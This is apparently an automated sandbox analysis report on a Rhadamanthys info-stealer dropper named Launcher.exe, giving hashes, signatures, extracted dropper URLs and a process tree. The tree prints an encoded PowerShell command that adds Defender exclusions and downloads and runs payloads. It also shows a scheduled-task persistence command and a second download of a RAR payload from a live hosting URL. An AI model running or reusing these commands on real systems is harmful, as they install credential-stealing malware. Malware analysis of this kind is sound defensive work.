Overview

overview

10

Static

static

3

Launcher.exe

windows10-2004-x64

10

Launcher.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    6s
  • max time network
    43s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-05-2024 13:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Launcher.exe

  • Size

    7KB

  • MD5

    b5e479d3926b22b59926050c29c4e761

  • SHA1

    a456cc6993d12abe6c44f2d453d7ae5da2029e24

  • SHA256

    fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

  • SHA512

    09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

  • SSDEEP

    192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio

Score
10/10
rhadamanthysexecutionstealer

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

    stealerrhadamanthys
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2820
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2252
    • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2328
        • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe
          "C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\4CB9.tmp\4CBA.bat C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\system32\chcp.com
              chcp 1251
              5⤵
                PID:1268
              • C:\Windows\system32\findstr.exe
                findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                5⤵
                  PID:2728
                • C:\Windows\system32\findstr.exe
                  findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                  5⤵
                    PID:4848
                  • C:\Windows\system32\findstr.exe
                    findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                    5⤵
                      PID:3420
                    • C:\Windows\system32\schtasks.exe
                      schtasks /query /tn "MyBatchScript"
                      5⤵
                        PID:3112
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        5⤵
                        • Creates scheduled task(s)
                        PID:1380
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4380
                        • C:\Windows\system32\reg.exe
                          reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                          6⤵
                            PID:2340
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2060
                          • C:\Windows\system32\reg.exe
                            reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                            6⤵
                              PID:2132
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/fb6688df07081a944ba4d480b80b21b779eefa19/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1880
                      • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe
                        "C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe"
                        3⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:2056

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    3KB

                    MD5

                    aa0a32b11dca7b04f4cc5fe8c55cb357

                    SHA1

                    00e354fd0754a7d721a270cdc08f970b9a3f6605

                    SHA256

                    e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

                    SHA512

                    1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    1KB

                    MD5

                    db3a2085d22f0fa009feb6060c919ace

                    SHA1

                    d570b614adf53c54135d8ba89ba0e9a77f743e1c

                    SHA256

                    acff94044f1e9ffa322ac7a6943f3395c35cb032ec74840ad3230718ac42adea

                    SHA512

                    e7f23352561884e987b52e247f0b813a6527b88a0fb3176802aec0bfd3dc3e85514ebb4774d49bc267c28795de7a4f75026c9ee9681d6e3741573abe1813cc73

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\4CB8.tmp\4CB9.tmp\4CBA.bat
                    Filesize

                    6KB

                    MD5

                    62d6dc76d46f18df518a85ffa77fa2de

                    SHA1

                    2a5a9af3946ccfdc4f7eac894fa094bdf0d1f66b

                    SHA256

                    8fee639c4fa22551d43c8daf797bcb2269419c545447e0d5b43b66f54d69d728

                    SHA512

                    b81945c08b55b029dfca8b14cfd106270aacec5de3be70e151b95855c533c3d02b8b19257f3347da8c085248588b65f24c07bddbf291e951a33e26e7386b6f66

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukap5mnl.um3.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k10.exe
                    Filesize

                    93KB

                    MD5

                    d7e0458b48ff73bbc98182f86fc02bce

                    SHA1

                    58a8615c4d5b5b23fa8033effd7924df835bdcba

                    SHA256

                    b124e36b99efaf36522d87772480869dab738d9bbfc48f4ac87988a14981b8c4

                    SHA512

                    9a164e5e76f42b0d223f70d70999b24782999cf48ab3ace8064ffcd88f3b3ec667e5c00a59466218c0b86cf2f0b539fbf42f9252b0aca98de3e5f81e3b89bfd2

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\3dvx3d5f.1k11.exe
                    Filesize

                    355KB

                    MD5

                    c93d65bc0ed7ee88d266b4be759301f8

                    SHA1

                    8c0c415ba824737c61904676e7132094f5710099

                    SHA256

                    f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

                    SHA512

                    7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

                    Download Submit

                  • memory/2056-54-0x0000000003BE0000-0x0000000003FE0000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/2056-57-0x0000000075800000-0x0000000075A52000-memory.dmp

                    Filesize

                    2.3MB

                    Download

                  • memory/2056-55-0x00007FFE45F80000-0x00007FFE46189000-memory.dmp

                    Filesize

                    2.0MB

                    Download

                  • memory/2056-59-0x0000000000520000-0x000000000058D000-memory.dmp

                    Filesize

                    436KB

                    Download

                  • memory/2056-36-0x0000000000520000-0x000000000058D000-memory.dmp

                    Filesize

                    436KB

                    Download

                  • memory/2056-53-0x0000000003BE0000-0x0000000003FE0000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/2252-58-0x0000000000FA0000-0x0000000000FA9000-memory.dmp

                    Filesize

                    36KB

                    Download

                  • memory/2252-61-0x0000000002E60000-0x0000000003260000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/2252-62-0x00007FFE45F80000-0x00007FFE46189000-memory.dmp

                    Filesize

                    2.0MB

                    Download

                  • memory/2252-64-0x0000000075800000-0x0000000075A52000-memory.dmp

                    Filesize

                    2.3MB

                    Download

                  • memory/2328-14-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-40-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-16-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-15-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-13-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-12-0x00007FFE25130000-0x00007FFE25BF2000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/2328-3-0x000001BD9E050000-0x000001BD9E072000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/4088-0-0x00000000009E0000-0x00000000009E8000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/4088-1-0x00007FFE25133000-0x00007FFE25135000-memory.dmp

                    Filesize

                    8KB

                    Download